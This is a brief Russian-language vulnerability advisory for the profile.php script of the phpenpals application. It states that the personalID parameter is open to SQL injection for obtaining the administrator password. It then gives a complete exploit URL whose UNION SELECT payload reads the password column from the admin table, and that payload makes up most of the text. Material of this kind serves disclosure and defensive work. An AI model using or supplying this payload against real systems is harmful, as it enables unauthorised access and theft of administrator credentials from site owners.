Описание:
Уязвимость скрипт:
profile.php
Уязвимость находится в $personalID и позволит провести SQl-инъекцию для
получения пароля администратора.
Ссылка:
http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*